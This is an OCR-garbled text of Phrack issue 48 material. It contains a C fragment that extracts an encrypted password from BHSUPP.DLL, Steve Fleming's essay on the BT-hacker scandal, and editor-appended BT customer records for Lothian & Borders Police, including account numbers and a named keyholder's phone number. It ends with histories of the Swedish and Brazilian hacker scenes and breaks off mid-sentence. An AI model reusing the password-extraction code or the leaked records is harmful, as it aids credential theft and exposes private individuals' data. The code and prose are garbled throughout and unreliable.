FILE _FLAG SEQUENTIAL SCAN, NULL); 

//too lazy to make the error message report the actual path and file name tried 

if (*phTargetFile == INVALID_HANDLE_VALUE) 

{ 

WriteFile(g_hStdOut, "Unable to open BHSUPP.DLL\n", 
26, &nCount, NULL); 
ExitProcess(1L); 

} 
} 
// This function allocs one big buffer and reads the whole damn DLL into it. 
// There is a flag string that marks the start of the section that contains the 
// encrypted passwords (in the case that there is a display password too), so 
// we search for the first and last characters in the string. If we hit on a match 
// we check about 50% of the chars in the string for a match. This is a good 
fi, enough check based looking at the data. I guess I could optimize memory usage 
// here too, but 24K is not very much these days, so fuck it. 
BOOL GetEncryptedPassword (HANDLE hTargetFile, LPBYTE lpEncryptedPassword) 
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LPBYTE lpSearchBuffer; 
UINT nCount, i; 


//do the big buffer alloc 
lpSearchBuffer = malloc (MAX_FILE_SIZE); 


if (lpSearchBuffer == NULL) 
{ 
WriteFile(g_hStdOut, "Memory Allocation Failure - Terminating\n", 
41, &nCount, NULL); 


ExitProcess(1L); 


} 


//cead in th ntire file. It is small enough that this takes trivial time to comp 


ReadFile(hTargetFile, lpSearchBuffer, MAX_FILE_SIZE, &nCount, NULL); 


//do search for RTSS&G--BEGIN When it is found move 48 bytes past the R and copy 
//the encrypted password into the workspace 
for (i=0; i<nCount; i++) 


{ 


if (lpSearchBuffer[i] == ’R’ && lpSearchBuffer[i+14] rely 
{ 
if (lpSearchBuffer[i+l] == 'T’ && lpSearchBuffer[it2] == ’S’ && 
lpSearchBuffer[it+3] == ’S’ && lpSearchBuffer[i+4] == ’&’ && 
lpSearchBuffer[it+8] == ’B’) 


//found password and coping it into the workspace 
memcpy (lpEncryptedPassword, &lpSearchBuffer[i+48], 32); 


//cleanup the mem alloc 
free (lpSearchBuffer) ; 


//ceturn with success 
return TRUE; 


} 


//cleanup 
free (lpSearchBuffer) ; 


//it failed to find the marker string 
return FALSE; 
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==Phrack Magazine== 


Volume Seven, Issue Forty-Eight, File 16 of 18 


THE TRUTH, THE WHOLE TRUTH AND NOTHING BUT THE TRUTH- 
-a story of the ’BT-Hacker’ scandal. 


By Steve Fleming 


Sitting in a chilly university computer department in northern England 
was in itself exhilarating. The mid-February climate made it cold; my 
head was buzzing with voices chatting freely about gaining access to 
secret computers, acquiring free telephone calls and how to fashion 
‘bombs’ to maim or kill lecturers and ’Senior Vice Principles’. There 
was nobody else in the room, all the company was just under a meter from 
me in CyberSpace, that alternative universe where anything is possible 
and everyone is somebody they want to be. The stories were 
extraordinary - in fact they were incredible, an eclectic mix of fact 
and fantasy bound together by expert social engineering. 


These CyberSpace ’cafes’ are the BBS’ - Bulletin Board Services - and 
are the stock-in-trade of the electronic community. The Internet is 

connected to some of them, but the best ones, the ones with the best 
c 
£ 
i 


hat and the most exciting files are not - you get the dial-in number 
rom another user, and have to then beg to use the service. It is 
nteresting to note that the Internet has now become a generic term for 
on-line communication and suffers as a result of its inappropriate use. 
Blaming the Internet for anything is like apportioning culpability to 
‘society’ - fine for academics but otherwise a shallow construct. 


I have known some computer experts in my time, and still some ’ reformed 
hackers’ count as my best friends - I really wanted to find out if a 
major British computer could be hacked or if it had been done. The UK 
has some of the most draconian secrecy laws anywhere on the planet, so 
if secrets are found, they tend to be kept secret. When people start 
talking in CyberSpace, they really talk and talk and talk. Their voice 
has no tone or volume, no emotion or mood - it can be like talking with 
a form of electronic psychopath sometimes. But there are inventiv 

ideas ’on-line’, and sometimes you can SHOUT, but this is quite rude, 
mostly pictorial punctuation (the smiley) is the key. You can indicate 
a smile :-) or a frown {:-( and you can even indicate sarcasm ;-) with 
a sly wink. It’s interesting to note that irony is not really a north 
American thing at all; sarcasm is a CyberSpace thing. I wouldn’t say 
that I am an expert, I wouldn’t even say that I was very good with 
computers, I’m always learning. My qualifications are in science; 
Biology and Psychology, not computing. What this gives me is an urge to 
investigate assuming a null hypothesis - I disprove things in short. 
It’s funny to think that most of the press followed a placed PR line 
that I must be a’... twisted computer boffin who had broken into an 
’...entirely robust...’ computer system’. And my, did that title stick 
—- friends from Hong Kong to Turkey called to say I was a computer expert 
all over the world! This was very effective and obviously placed by 
someone with powerful influence, perhaps advertising influence? It 
doesn’t really matter, bad journalism is all over and we all have a 
living to earn —- I however, would never do it at the expense of a 
colleague. 


There was the vision of news editors screaming, "... get me some 
secrets!" they simply couldn’t believe that a freelance with only a 
few published pieces could have brought in such an impressive story with 
a scandal at every level so they capitulated with the ’boffin’ lie and 
went back to boring, standard, sloppy ‘’background’ on this ‘hacker’. It 
was actually a bit of a personal tragedy, my on-line persona was 
cracked, there wasn’t very much in my life at all, quite a boring person 
really; like most journalists who spend a lot of time observing rather 
than doing. The Today newspaper had some hot tip-off’s from people I’d 
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nterviewed in the past, one man in particular who had lied in a silky 
nd attractive way for two and a half hours had been doing the same to 
hem. The fact that I wrote for a ’gay magazine’. Shock horror, a 
efinite Philby, Burgess & McLean story breaking. What a bit of 
nvestigate journalism that wasn’t, I wrote under my own name! Was he a 
py, was he working for Libya, Israel, MI-6, MI-5, the Labour Party, 
uncan Campbell, Richard Gott... and then there was the ’shit-—bagging’. 
his happens when tardy investigators are ignorant of the facts, 
utomatically they assume it should be them who had the story, if only 
hey’d had the time. But this is all history now, and I forgive them 
all... but I never forget. 


tTUHUHEH Act Oo P- 


How could a temporary member of staff see all this secret information? 
The list forming in the mind of the press (and I do think in situations 
like these one surprisingly tiny mind) went something like this: 


They aren’t secrets at all. 


2s BT would know if anyone had looked at the secret stuff, so 
they’ 1l catch the whistle-blower; probably working for computer 
security within BT. 


ce Fleming is a computer expert, he’s hacked the system and is 
spinning a story to prevent him being found out - and he’s not a 
‘real’ journalist and we are. 


Well, there was clear evidence that the stuff was very sensitive, so 
strike number 1 from the list. How could they wait for stage two, if it 
is the case it may take days or weeks, so they couldn’t have that - 
anyway the Independent had shown it could be done away in time or place 
of Fleming. The only option was; who’s there, who’1ll talk, and how can 
we retain credibility as journalists - repudiate the freelance! 


There was no shortage of shit-bag material; /various anonymous 
sources... unconfirmed reports... it seems likely etc.’ Some even 
fancied the idea that the details were shocking, but lets just do it all 
ourselves and dump on Fleming from a great height? It really was like 
being on a maggot farm, wading through pen after pen of repulsive, 
brainless, panicked... maggots. 


The truth is that there was no great skill involved in cracking BT’s 
computer, it was so easy my pet parrot could have done it with only one 
claw. Many companies are confused about computer security and what it 
means. The sharp young suits talk about /magneto-optical storage 
facilities’ and ’EPROM or WORM access’. The captains of industry nod 
sagely, they run the ship and leave the deck scrubbing to junior 
officers. These proud, self important and generally thick as two short 
planks when it comes to computers men, authorise huge budgets for the 
whiz-kids who play with the money, buy new things, install new software, 
‘patch’ the operating system, attach ISDN cards, issue user ID’s after 
extensive family checks. You name it, and these guys do it, and they 
love it. They install password checkers that look for hackers (or 
errors) and disconnect users for 15 minutes if they get their passwords 
wrong three times. The captains of industry still discuss ‘wireless’ 
and ’word processors’. The bright young men should be allowed to deal 
with all the computer stuff, it’s not that the captains can’t understand 
it or anything like that, they just don’t have the time. 


Staff who have to work the systems couldn’t care less about the 
‘advanced software engineering’ that went into the system. There is as 
much ’social engineering’ as any other sort when it comes to computers 
for industry. So they have to remember passwords that change regularly 
and they have to remember to get that report done, and see the boss and 
train the new staff and type that letter and claim those expenses and 
design that form and... it’s a lot to remember. When folk have a lot to 
remember they make lists, and those lists include passwords - sounds 
like an opportunuty for ‘trashing’. They simply look through the 
rubbish and see what they can see. Sometimes someone writes down a 
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password on a post-it note to let someone into their computer for some 
reason, that person enters the password and makes a note in their diary 
of it and pops the sticky in the bin. Then, in these busy offices, 
staffing levels are being cut. The managers need a dozen staff, and 
have four. They are allowed to contract from a temp agency and top up 
the office. These people are often unemployed graduates. Clever, but 
very, very bored. They don’t get paid much, 4.00 an hour. That’s what 
I was paid to write a nationwide database suite for BT but there I have 
to stop, the gag is cutting into me. They just want a decent job, and 
try to impress in case they get offered one, and the companies play on 
this and exploit without mercy. 4.00 an hour and they want unbridled 
enthusiasm, ideas, loyalty, commitment - who are they trying to kid! 


The computer administrators say they can’t give temporary access to the 
system, ’... it can’t be done.’ Well what do you suggest? ‘’You’1l just 
have to make do, it’s the system, can’t help, sorry.’ You need a dozen 
workers, perhaps 6 need to be on the system, you have 5 passwords plus 
another of the departmental manager making six. Why not let the temps 
use these passwords and you can get on with the more important stuff, 
can’t be any harm in that? It’s not as if we’re using them? However, 
temps are just that, temporary - they move on. Consequently with all 
the changes you make up a folder with all the passwords and then they 
can just flick through that to find a password, it doesn’t seem all that 
insecure does it? 


And there we have it, passwords being shared, passed, written down, 
typed in and shouted across the office. You can forget about any notion 
of security, the moment you take that step the whole system is 
pointless, you may as well print out all the secret information and sell 
it in Dillons - it would certainly make the phone book a best seller! 
Better still if the marketer’s got what they wanted, put it on CD-ROM 
and charge a fortune for it at christmas; 


[The Multimedia Secrets Collection, 199.95! 


The ideal christmas gift for the spy in your life. Includes music from 
around the world. BT, it’s good to talk! NB it may be an offence to 
talk to anybody about this. 


Now you see why BT are keen to quell this espial, they know the 
situation, but don’t want it publicised, it’s very embarrassing for 
goodness sak they have a contract to advise the government on 
computer security! Frankly, I couldn’t care less if some BT mandarin 
gets a red face, it is no concern of mine. What is, is the fact that 
these secrets are not encrypted and are broadcast around the country on 
computers and are available to just about anyone who cares to look at 
it. The only warning displayed was ’Unauthorised access is an offence 
under the Computer Misuse Act (1990)’ - but this access isn’t 
unauthorised, is it? This notion of ’confidential’ is a joke. BT’s 
computers happily broadcast your ex-directory telephone number (and soon 
your name) down the line unless you make the choice to prevent it. What 
is confidential about that? The public interest is of prime importance 
here. The scandalous intimition in my legal gag is that I am risking 
national security? Me! Well I have a lot to say about that, it’s not 
me that allows any old temp to see secrets, and I have never printed a 
single telephone number or details of any equipment, unlike some 
respected others. I brought the fact this could be done to light ina 
responsible journalistic manner. 


If I was such an expert, the intelligence service would have snapped me 
up immediately, BI would have paid me off and the government could have 
avoided embarrassment. But I’m not, I’m a journalist. The Independent 
published this story and I have respect for them, they took a risk and 

then wanted to distance themselves from me, which I understand. It was 
however a lonely, cold and frightening experience which is not yet over. 


The governments of these lands talk big about how the information 
superhighway will change all our lives, and how committed they are to 


16.txt Wed Apr 26 09:43:41 2017 4 


servicing this new form of infrastructure leading to a new, fresh and 
exciting dimension - but they also punish, abuse, prosecute, imprison 
and destroy the lives of the people who may be far better able to 
exploit their ignorance and expose the sensitive underbelly of their 
power — their information. If you ask me, the old guys will make 
CyberSpace just as ugly and corrupt as the society they have already 
spawned, nurtured and set on a path of destruction out here. I for one 
don’t want or need their advice, support or money - let them lay in the 
bed they have made, I’1ll1 stay in CyberSpace. 


—- Related Info Appended by the Editor - 


DCS DISPLAY CUSTOMER SUMMARY 22/22/22? 11:41 
Name : THE CHIEF CONSTABLE Telephone No : 031-315 2007 NOR 
Account No : 8077 0366 
Address: LOTHIAN & BORDERS POLICE Customer Type: BUSINESS VOLUME 
POLICE HEADQUARTERS Installations: 1 
5 FETTES AVE 
EDINBURGH LINE DETAILS 
EH4 1RB Installed : 26/08/88 
Line Status : B/W 
Curr State 
Inst Class’n : BUS SINGLE EXCL 
ORDER Exchange Type: TXDX03 
RECEPTION MARKER Recent Order : YES 
Contr Signed : BILLING 
REPAIR CONSENT Method of Pay: ORDINARY ACCOUNT 
: NO Systems Bus : C A/C U/Enquiry: NO 
Servicecare : NO Sup Serv Bus : D D/M Case : NO 
O/S fault : NO Cust Options : STANDARD VRUF 
Hist fault : NO OSC Ind : NO 
Hazard : CUSTOMER CONTACTS 
Warning : Issue : NO Notes : YES 
BRDCST MANAGERS USING NJR-PLEASE DNB"NJRNEWS" FOR UPDATE ON CALLOUT PROBLEM ES 
4A O-O 
DCRD PRODUCT TARIFF DETAILS 22/22/22? 11:41 
Exchange Name : DEAN Tel No : 031-315 2007 NOR 
Installed : 26/08/88 a/c No : 8077 0366 
Inst Class’n : BUS SINGLE EXCL Notes : YES S/S No : 
OTY PROD ID SHORT DESC or MSC / CP NOTE TARIFF :RATE TOTAL 
1 A1l4499 C EXCH LINE + LINEBOX 32.66 32.66 
* 
1 A10117 C BASIC DIAL PHONE 4.70 4.70 
* 
1 A12481 C PRIVACY SET NO 8 oa Os ic) BT 245 
* 
TARIFF GRAND TOTAL : 89.11 
ES 
4A O-O 
DIN DISPLAY NOTE DETAILS 22/22/22? 11:41 
Installation : THE CHIEF CONSTABLE Tel no : 031-315 2007 NOR 
Name 
WRITTEN < AUTHOR > EXPIRES 


8/ 2/94 JOSEPHINE/8813 8/ 2/95 
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A/.D LTR SENT FOR 0506843235, 0313322106 
0506881101 AND 0313152007 
DCS DISPLAY CUSTOMER SUMMARY 22/22/27? 11:43 
Name LOTHIAN & BORDERS POLICE Telephone No 031-332 2106 NOR 
Account No 8076 9640 
Address: POLICE HEADQUARTERS Customer Type: PAYPHONE BUS 
5 FETTES AVE Installations: 1 
EDINBURGH 
EFH4 1RB sINE DETAILS 
Installed 04/10/83 
Line Status B/W 
Curr State 
Inst Class’n BUS PAYPHONE 
ORDER Exchange Type: TXDX03 
RECEPTION MARKER Recent Order NO 
BMC/C/N/ / / Contr Signed YES BILLING 
REPAIR CONSENT Method of Pay: ORDINARY ACCOUNT 
cis Systems Bus D A/C U/Enquiry: NO 
Servicecare S Sup Serv Bus € D/M Case : NO 
O/S fault NO Cust Options SINGLE LINE OPTION 
Hist fault NO OSC Ind : NO 
Hazard CUSTOMER CONTACTS 
Warning Issue COM Notes YES 
ES 
4A _ O-O 
DCRD PRODUCT TARIFF DETAILS 22/22?/27? 11:43 
Exchange Name DEAN Tel No 031-332 2106 NOR 
Installed 04/10/83 a/c No 8076 9640 
Inst Class’n BUS PAYPHONE Notes YES S/S No 
OTY PROD ID SHORT DESC or MSC / CP NOTE TARIFF: RATE TOTAL 
A17867 C PAYP LINE SKTD SGL LINE TG10 32.66 32.66 
* 
A19493  C OPTION 50 NON-ISDN SITE LINE 0.00 0.00 
* 
A11790 C INTERNAL EXTN OFF MASTER SCKT 0.00 0.00 
* 
A17817  O MINSTREL PLUS PHONE Outright sale 
FREE GIFT - NO GUARANTEE 
A11810 C METER PULSE FACILITY 6.70 6.70 
* 
A19398 C PAYPHONE 190MP TABLE-TOP MODEL Outright sale 
KEYHOLDER BETTY MITCHELL ON 031.311.3338 
Standard Care charge on A19398 12.00 12.00 
* 
TARIFF GRAND TOTAL 51)...3'6 
ES 
4A O-O 
DIN DISPLAY NOTE DETAILS 227 22/22 L1is43 
Installation LOTHIAN & BORDERS POLICE Tel no 031-332 2106 NOR 
Name 
WRITTEN < AUTHOR > EXPIRES 
8/ 2/94 JOSEPHINE/8813 8/ 2/95 
A/.D LTR SENT FOR 0506843235, 0313322106 


0506881101 AND 0313152007 
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International Scenes 


There was once a time when hackers were basically isolated. It was 
almost unheard of to run into hackers from countries other than the 
United States. Then in the mid 1980’s thanks largely to the existence 
of chat systems accessible through X.25 networks like Altger, tchh and 
QSD, hackers world-wide began to run into each other. They began to 
talk, trade information, and learn from each other. Separate and diverse 
subcultures began to merge into one collective scene and has brought us 
the hacking subculture we know today. A subculture that knows no 
borders, one whose denizens share the common goal of liberating 
information from its corporate shackles. 


With the incredible proliferation of the Internet around the globe, this 
group is growing by leaps and bounds. With this in mind, we want to 
help further unite the communities in various countries by shedding 
light onto the hacking scenes that exist there. If you want to 
contribute a file about the hacking scene in your country, please send 
it to us at phrack@well.com. 


This issue we have files about the scenes in Sweden and Brazil. 


The Swedish Hacker Scene 


It’s about time to fill up this hole in the worldwide history of hackers 
published in the Phrack series of articles on national scenes. Since no 
one else seems to be getting around to do it I’d better do it myself. 


Sweden was in fact one of the countries in the front line during the 
birth of computers in the 1940’s and 50’s. By 1953 KTH university in 
Stockholm built BESK, at the time being the fastest and most advanced 
computer in the world. During the late 1960’s Linkoping university 
specialized in computer science and in 1973 the computer society Lysator 
started out as an offshoot of american hacker culture of the kind you 
could find at MIT during the 60’s and 70’s. They are still active and 
often referred to as the first Swedish hacker society ever, which is 
indeed true. Now days they still adhere to the international hacker 
ethic of university societies and among their lines are as well idiots 
as real bright guys (as is the case of most such societies) and their 
contributions to the world of e-culture include Project Runeberg; a text 
archive of Scandinavian literature, and a voluminous FTP archive. 
There’s actually a lot of ASCII work being done at Lysator, including 
converting Phrack back issues to HTML format. 


Despite the early interest in computers in Sweden there was no 
equivalent to the American phreakers of the 1970’s. This was not caused 
by lack of knowledge but rather by dullness. Sweden was during the 70’s 
and early 80’s in a period of both economic wealth and social mentality 
commonly known as "The Welfare State". Everybody was facing the same 
high economic standards, nobody was really displeased with Swedish 
society, and the government granted lots of spare-time activities for 
youths. Thus the growing ground for any outlaw societies was withdrawn. 
(Eg Hells Angels didn’t start out in Sweden until the 80’s.) Swedes were 
in fact too pleased, too wealthy and too filled up with their vision of 
an almost utopian society to even get the faintest glimpse of an idea to 
form any underground movements. Even political groupings like 
Anarchists, Hippies (in Europe referred to as "Provos") or Fascists were 
almost WIPED OUT by the extreme political climate and wealth of the 
70’s. 
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Thus, phreaker culture couldn’t possibly start out in Sweden at this 
time, though some freaked out engineers and radio-amateurs might have 
built blue boxes and similar equipment for their household needs. This 
state of society caused Sweden to lag behind other European and 
Scandinavian countries in the field of outlaw hacking. 


The first hacker activity in Sweden was reported by the authorities in 
1980. The hacker in question was a student at Chalmers university in 
Gothenburg and was sued for manipulating the account system into 
granting him free access to the mainframe, for which was sentenced to a 
relatively light fine. Apart from some similar incidents carried out by 
bright individuals there was no real H/P scene until 1984. Also in 1980 
BBS activity started out in Sweden. Most enthusiasts were using a 
Swedish micro built by Luxor and DIAB in 1978 called ABC-80 (Obviously 
inspired by the American TRS-80). These enthusiast, however, were well 
organized engineers running a straight user-group, no anarchists or 
radicals of any kind were ever involved. 


In 1984 a magazine called "Rolig Teknik" started out as an offshoot of 
YIPL/TAP featuring the same kind of material, and by 1987 some 
journalist "discovered" this magazine, causing a lot of noise throughout 
The Welfare State and bringing people out in a public debate of how to 
defeat this magazine. (Though it actually didn’t feature any illegal 
material; even Sweden has the freedom of speech and press written 
explicit in its constitution, as in the American First Amendment.) 
"Rolig Teknik" rapidly became a cult media for underground electronic 
freaks, outlaw radio amateurs, and other antisocial movements. But let’s 
not get ahead of events. 


By early 1984 two youths aged 17 and 19, clearly inspired by the movie 
"War Games", hacked their way into several Swedish computer systems 
using a simple Apple II and a 300 baud modem, notably DAFA-Spar - a 
register containing public information on every Swedish citizen. Though 
there were no secret data in this computer, and though these hackers 
never succeed in gaining root access, the incident was annoying to the 
authorities. Also this year, some wealthy upper-middle class youths 
started using the was-to-become major European home computer: the 
Commodore 64. What the Apple II was for America, the C-64 was for 
Europe. Enter the software crackers. 


C-64 was THE symbol of hackerdom to Swedish youths in the 1980’s. As 
software cracker Mr.Z pioneered the hacker scene in 1983 with hundreds 
and hundreds of cracked games, Swedish hackers somehow got to believe 
that cracking games was the Big Thing for any hacker. Besides, not many 
of these guys had modems. By 1987 American game producers were alarmed 
by the Niagara of cracked C-64 software being downloaded from Europe, 
causing them to start copy-protecting games that were to b xported to 
Europe. A closer examination showed that a lot of these cracks were made 
by Swedish groups, notably Triad and Fairlight. Thus, most Americans to 
get in touch with the Swedish hacker scene were what you would refer to 
as the "Warez DOOds" or "Pirates" of the time. Since the Swedes wer 
unable to phreak due to lack of knowledge in the telecom field, American 
warez d00ds constantly called up Swedish crackers to obtain the latest 
software. 


There seems to be some kind of misconception in the American view of the 
hacker culture of Europe: Not very many hackers in Sweden and the rest 
of Europe got into phreaking nor net hacking in these early years, 
perhaps with the exception of the movement in Germany caused by Chaos 
Computer Club. By tradition most European hackers in general, and 
Swedish hackers in particular, turned to software cracking and demo 
programming. (The Demo as an art form was invented in Europe during 
1984-86.) None of these activities were actually illegal at the time 
being, though indeed underground. This might have helped to create the 
general American view of European hackers as "Idiotic Immature Warez 
DOOds". In fact, most European hackers look upon software cracking and 
demo programming with pride, though spreading (warez trading) wasn’t 
considered a real hacker activity, and pirating for economic gain was 
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looked upon with disgust and utter contempt. Software spreading in all 
forms was finally outlawed in Sweden January lst 1993. 


1986: Enter the Netrunners. 
By the year 1986 the legendary BBS "Tungelstamonitorn" under the 
supervision of Jinge Flucht began distributing H/P and Anarchy files. 
Jinge himself, being a social inspector and thereby fully aware of the 
state of society, was upset with The Welfare State and thought the 
Swedes had gone law-abiding in an absurd and unhealthy manner. In his 
view people seemed to accept laws without ever questioning them, thereby 
making Sweden into a conformistic utopian hell. Later Jinge joined the 
Fidonet where he got known for running the most explicit and intense 
debates in Swedish BBS-culture ever. 


Probably the H/P files stored at Jinges BBS were the spark that lit the 
Swedish net hacking scene. Swedish hackers had SEEN "War Games", HEARD 
about the CCC in Germany, and now they finally got their hands on 
documents that explained the techniques. In 1987 excerpts from Steven 
Levy’s "Hackers" and Bill Leebs "Out of the Inner Circle" were reprinted 
in the Swedish computer- magazine "Datormagazin" by editor Christer 
Rindeblad, creating a common group-awareness among Swedish hackers. 
("Out of the Inner Circle" had actually been translated to Swedish 
already 1985, but was obviously read mostly by security experts and War 
Games-obsessed wannabe’s.) 1987 also saw the birth of the first 
all-Swedish hacker group ever to make themselves a name outside 
Scandinavia. This was of course SHA - Swedish Hackers Association. 


SHA wanted to be a hacker group of international standards and 
qualities. They collected the best people, storing up a knowledge basis 
for future use. In the years 1989-92 SHA was at its height, successfully 
trashing computer companies and computer scrap dumps and gaining access 
to hundreds of computers. Inspired by the German hackers Pengo and 
Hagbard in Leitstelle 511 they started having regular meetings on 
fridays at their own booked table in a restaurant in Stockholm. Their 
perhaps biggest achievement ever was made in 1991 when they wrote a 
scanner to exploit the Unix NIS-bug, running it on 30 processes 
simultaneously, and ending up with some 150.000 passwords whereof 600 
gained root access. Though some would say SHA were a bit too fond of the 
media image of hackers and sometimes had a weakness for hacker cliches, 
no one can really deny their achievements. 


Swedish hackers also got a lot attention for their carding activities in 
1989. Both Sneaker of SHA and Erik XIV of Agile wrote modulo 
10-calculators to produc ndless series of valid Visa-numbers. Erik XIV 
was even on national television, demonstrating the weaknesses of the 
credit card system. Cynically they were both busted. 


At Christmas 1990 the Swedish X.25 network Datapak and Decnet were both 
attacked by a group of UK hackers called 8LGM (8 Little Green Men or 
8-Legged Groove Machine - I don’t know which one is a media nick). Using 
a war dialer they scanned about 22.000 entries and successfully accessed 
380 of these. This is perhaps the most well-known of all hacks in 
Sweden, causing a lot of media noise. (The exact figures are a product 
of the Swedish telephone system AXE that I will write more about ina 
moment.) As reported in Phrack #43 they were busted and convicted under 
the new British anti-hacker law. 


Later Swedish achievements include the phonecard emulator, constructed 
by Atari ST enthusiast Marvin in 1992, after hearing the Swedish phone 
company Telia boast of these prepaid phonecards superior security. 
Though these silicon-based chip phonecards (256 bytes serial EPROMs) 
couldn’t actually be recharged or easily tampered with, he realized 
there was no problem in emulating the chip with a Motorola 68c705 
one-chip computer. Some fake phonecards were manufactured and sold for 
almost nothing among his very best friends more on a "See, it can be 
done"-basis than with any intention to defraud Telia or earn heaps of 
money. Somehow the blueprints for the emulator found its way into the 
Internet. 
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Swedish hackers in general have a very strong tradition of forming 
groups, due to their roots in programming activities rather than 
phreaking. Group awareness and culture is very widespread and accepted 
within the boundaries of the whole Swedish computer underground. Thus, 
LOYALTY is very strong among Swedish hackers. Most hackers who get 


busted by authorities or blackmailed by companies would rather DIE than 
telling the name of even a single 10-year old warez d00d. 


While we’re at it - hacker busts, and phreaker busts in particular, are 
carried out in quite a disturbing manner in Sweden. To explain this I 
must first explain a bit about the Swedish telephone system. 


Almost all Swedish networks use a system similar to 4ESS, constructed in 
cooperation by the State Telecom "Televerket" and Swedish 
telecommunications equipment producers Ericsson Telecom. This system is 
called AXE, which is an abbreviation for Automatic Cross-—Connection 
Equipment. AXE is used in some 100 countries all over the world and 
probably one of the most beautiful exchange systems ever developed. AXE 
is designed for national, metropolitan and rural networks, and the same 
system nucleus is used in all the different systems. It can control both 
digital and analog equipment, though it’s made with the aim on 
transforming all Swedish networks from analog to digital connections. It 
also comes with a fully featured bureaucratic organization for 
maintenance, administration and economics in general. AXE has the 
capability of building virtual groups in switching-stations, thus 
putting your PBX into the telco soup as well, making you believe you 
have the control over it though it’s actually located elsewhere. 


In short, this is an centralized, monolithic system of the horribly 
efficient type that telcos love. It tells any amateur to keep their 
hands off and do something else. Of course it’s a system that hackers 
and phreakers hate, since it’s limited to authorities. The filthy crowd 
do not know what is going on inside these exchanges, and the telcos like 
to keep it that way. 


AXE also works with stored program control that resides inside the 
system core of every switching station. Of course this is all software, 
and of course State Telecom, upon building AXE, couldn’t hold back their 
Big Brother tendencies. 


The result is that every call made from anywhere to anywhere, is logged 
in a central computer. Now that’s something! Not only did this equipment 
wipe out every possibility to box within Sweden, but it also removed all 
kind of phone privacy. In fact not only calls are logged, but ALL 
activity performed at your terminal. If you lift the handset, press a 
digit and hang up, time, date and the digit you pressed is registered. 
All this data is stored on magnetic tapes for 6 months. 


Now, luckily Sweden has a strong Computer Privacy Act. You just aren’t 
allowed to set up and use such facilities as you please, not even if you 
are the State Telecom. There is even a specific authority, 
"Datainspektionen" (The Computer Inspection Department) with the only 
purpose of looking after and preserve citizen privacy by protecting 
individuals from corporate and governmental interests. As a result State 
Telecom "Televerket" (which later changed name to "Telia" as they were 
transformed from an authority into a private corporation as of July lst 
1993) were not allowed to give out any of the information gathered in 
these registers to anyone else than either the calling or the receiving 
party. Not even the police could have this information in case they 
weren’t suspecting a indictable crime resulting in at least 2 years of 
prison, such as drug trading or terrorism, and you don’t get that kind 
of penalty for phreaking alone - at least not in Sweden. 


But Telia could evade these restrictions. In order to successfully 
phreak using PIN-codes, you have to call an operator using a Swedish 
version of the 800-number: a 020-number. Telia could then claim the call 
was made to the owner of that number: AT&T, MCI & Sprint mostly. (There 
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are of course Calling Cards in Sweden as well: "Telia Access" neither 
used nor abused by anybody.) As well as these companies have their own 
intelligence agencies, so have Telia. Once eg AT&T had someone traced 
for phreaking, Telia could easily produce a complete list of calls made 
to AT&T operators from a certain number. Telia themselves would even use 
information they weren’t allowed to: they would pull out a list of ALL 
outgoing calls from the phreaker in question including calls to MCI, 
girlfriends, mom, dad, grandma... all logged calls. 


Telia would then call this poor phreaker to their local Swedish office, 
sticking the endless list under his/her nose, commanding: "TALK, or we 
will turn you in to the authorities", carefully not to mention that all 
information on the printout would be absolutely useless in court. The 
only conclusive evidence would in fact be those calls traced back all 
the way from America or wherever the phreaker called; in that way 
rigorously documented. Naturally, the common phreaker had no legal 
experience and wouldn’t know about this. Instead he would talk, giving 
out detailed information on his/her techniques worthy of a full-time 
high-educated security consultant. After this session the phreaker was 
given a bill of the calls that could indeed be proven in court. If 
he/she didn’t pay it - Telia (or any other operator) would end up 
turning him/her to the authorities anyway. So much for cooperation. 
Telia themselves would, if they felt it was necessary, go even further 
than the overseas operators, systematically exposing every weakness in 
the phreakers personal life, using the information in the computer log 
for psychological terror. 


} 


his pattern of treatment of Swedish phreakers seems to be very much the 
same among all telecom providers in Sweden. Lately Telia, under command 
of security officer Pege Gustavsson made some noteworthy mistakes 

though: in their efforts to convict as many phreakers as possible, they 
called up companies receiving calls from "Suspicious" individuals, 
W 
T 


arning them about this or that person calling them over and over again. 
his could only mean Telia was also systematically monitoring some 
Swedish hackers and had formed some security group to carry out this 
probation. Normally this should have been kept quiet, as Telia are 
absolutely not allowed to form their own abuse police forces, but at 
some instance they happened to call up a security company using 
phreakers as informants. Of course this security company didn’t like the 
idea of having "their" phreakers traced around, and the matter was 
brought to public attention. Many independent sources agreed that Telia 
had violated the Swedish Computer Act, and hopefully this brought an end 
to this wild tracing. You shouldn’t be too sure though, since Telia 
themselves never confessed of doing anything illegal. 


As you might have understood the Computer Act is quite an important 
factor in all legal discussions concerning Swedish hacking. This Act 
came out as a result of general attention focused upon the computers vs. 
privacy matter in 1973. As Sweden was one of the first countries to make 
use of computers in governmental administration, and as Swedish 
authorities were eager to register every possible piece of information, 
some politically influential individuals started a debate resulting in 
the founding of the Computer Act and the Computer Inspection Department. 
As a result Sweden is light years ahead of most countries when it comes 
to privacy matters. For example there is no problem in having the number 
identification possibilities on your line deactivated for good, and it 
won’t cost you anything. You can also easily obtain free printouts from 
any computer register containing information on you, including the 
register at your local AXE-exchange. 


To sum this article up I can draw the conclusion that even Sweden has 
had its handful of bright hackers, each category bringing their straw to 
the stack. Even though Swedish officials and companies would hardly 
admit it, these hackers have obviously been very important for this 
country, at least in forcing system managers, security officials, 
software producers, policemen, politicians and so on to think things 
over. Sweden has also attracted outside attention in some cases, and 
will probably keep doing so. If you should pin- point one group that has 
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meant more to the Swedish scene than any other, it wouldn’t be any of 
the H/P groups, but rather the cracking pioneers Fairlight - a well 
organized and world-famous warez producer. 


Linus Walleij aka King Fisher / Triad 
triad@df.lth.se 


(Some handles have been changed to protect retired Swedish hackers from 
luser mail.) 


Swedish readers may be interested in the fact that I’m currently writing 
a lengthy text in Swedish (a book actually) providing a closer look at 
Swedish hacking history, which will be released on hypertext and ASCII 
sometime later this year. Over and out from Sweden! 


HACKING IN BRAZIL 


Before talking about hacking here, it’s good to describe the conditions 
of living. Right now, the country is a mix of Belgium and India. It’s 
possible to find both standards of living without travelling long 
distances. The Southern part of the country concentrate most of the 
industry, while in the west one can find Amazonia jungle. There are many 
Brazils, one could say. 


Beginning with the hacking and phreaking. 


Hackers and computers enthusiasts have several different places for 
meeting. When this thing started, by the time of that film "Wargames", 
the real place to meet hackers and make contacts were the computer 
shops, game-arcades and "Video-texto" terminals. The computer shops were 
a meeting place because many of those "hackers" had no computers of 
their own and the shop-owners would let them play with them as part of 
a advertising tool to encourage people buying it for their kids. 


Today that is no longer needed, since prices dropped down and people 
make a team already at schools or sometimes just join a BBS (most people 
who buy a modem, end up thinking about setting up a BBS). By the way, 
